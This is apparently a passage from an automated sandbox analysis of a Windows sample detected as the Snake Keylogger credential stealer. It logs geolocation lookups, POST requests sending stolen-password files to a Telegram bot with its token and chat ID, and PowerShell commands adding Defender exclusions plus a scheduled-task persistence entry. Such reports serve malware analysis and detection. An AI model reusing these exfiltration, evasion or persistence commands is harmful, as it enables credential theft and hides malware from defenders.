2024-07-24 13:08:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49727	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:30 UTC	707	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1261 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wnTviRJ6c582R5pwCY3uqO0EeecVcLunEua1e5H6Lr1EF29ZprZGEmPosnAFtpKbp9uYB5X2A7%2FAvkD23CUWpzTBB3jufs%2Fi%2BsvfXrtvXfrYvGb9rl3EtE83MSBBz%2FyZcJIXqWO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423ab799e435d-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49728	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:30 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1261 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fc6W80WKEbH2Goh3dlcgZkJ4Gb7ib7d4cfQAlzNZXW3Zq0r8qQE9drb7zSkRjYbLvmi9mjjFppEASwnoGio6CpB4W1yCPtjtEaOepgDNzgeFTtyGbwu2rGaWsS9J1Yn%2Ft22Tk24%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423ac08817cf4-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49730	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:33 UTC	703	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1263 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjxtEAadqvZ1N61WJa9VvG23OovAnn33G61GfvEBmLo7J63rLy2mAvbapC207FMMOpOkPic8Bpv41d37ptMSFFWJ4Uegps00URGqIMR2v1v91nSZZk15Es3J2zFvjvD7Bvk%2B88%2Bz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423ba1e6443f7-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49732	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:35 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:35 UTC	711	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1266 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAasHM%2BIr%2B%2FqD908lbYNJgWRcgfvxMASgVFsNx5QXnx5Jb3K2GIt65751nEUvmzdcPdzI%2FVm0KriwCBYp8ta3fXAjgmygAGzSJKBg2i1wwBrfgvJHS5nm%2BXvOEyv53ZyhcxLeXNj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423cafb0f188d-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49735	149.154.167.220	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:36 UTC	358	OUT	POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-07-24 13:08:36 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 37 61 36 37 34 65 61 66 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 38 38 37 35 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20 2f 20 30 39 3a 30 38 3a 31 37 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcac7a674eafb1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:088753Date and Time: 24/07/2024 / 09:08:17Client
2024-07-24 13:08:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 24 Jul 2024 13:08:36 GMT Content-Type: application/json Content-Length: 500 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-24 13:08:36 UTC	500	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 32 34 31 38 32 30 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 61 70 70 79 62 6f 79 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 70 70 79 32 35 35 32 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 35 33 35 34 30 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 46 6f 6f 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 32 36 35 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e Data Ascii: {"ok":true,"result":{"message_id":71,"from":{"id":6724182006,"is_bot":true,"first_name":"Happyboybot","username":"Happy25521bot"},"chat":{"id":5535403842,"first_name":"Sea","last_name":"Food","type":"private"},"date":1721826516,"document":{"file_name":"Sn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49740	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:37 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:38 UTC	715	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:38 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1269 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2Cbl6wxThc7eFFeB6CHZJ8W33VDCd%2B%2BiVtHSKPfyeEyguAeAhM%2B7rF0THyFlvKsBSnPo6zuoMoJexstZHUdq2QikUHdGk%2BaGjh%2Bg%2BmJ%2BhcJI0phtErF%2BIjUQ8ljpoOQSPjliQYR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423d9db70424b-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:38 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49741	149.154.167.220	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:43 UTC	358	OUT	POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcac9db89d7b60 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-07-24 13:08:43 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 39 64 62 38 39 64 37 62 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 38 38 37 35 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20 2f 20 30 39 3a 30 38 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcac9db89d7b60Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:088753Date and Time: 24/07/2024 / 09:08:21Client
2024-07-24 13:08:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 24 Jul 2024 13:08:44 GMT Content-Type: application/json Content-Length: 501 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-24 13:08:44 UTC	501	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 32 34 31 38 32 30 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 61 70 70 79 62 6f 79 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 70 70 79 32 35 35 32 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 35 33 35 34 30 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 46 6f 6f 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 32 36 35 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e Data Ascii: {"ok":true,"result":{"message_id":72,"from":{"id":6724182006,"is_bot":true,"first_name":"Happyboybot","username":"Happy25521bot"},"chat":{"id":5535403842,"first_name":"Sea","last_name":"Food","type":"private"},"date":1721826524,"document":{"file_name":"Sn

Target ID:	0
Start time:	09:08:16
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\rPO0977-6745.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rPO0977-6745.exe"
Imagebase:	0xc70000
File size:	561'664 bytes
MD5 hash:	978148253C4B65B751FCD3CB4713F614
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
Imagebase:	0xa00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Imagebase:	0xa00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"
Imagebase:	0xbe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\rPO0977-6745.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\rPO0977-6745.exe"
Imagebase:	0x20000
File size:	561'664 bytes
MD5 hash:	978148253C4B65B751FCD3CB4713F614
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:08:17
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\rPO0977-6745.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rPO0977-6745.exe"
Imagebase:	0xb60000
File size:	561'664 bytes
MD5 hash:	978148253C4B65B751FCD3CB4713F614
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
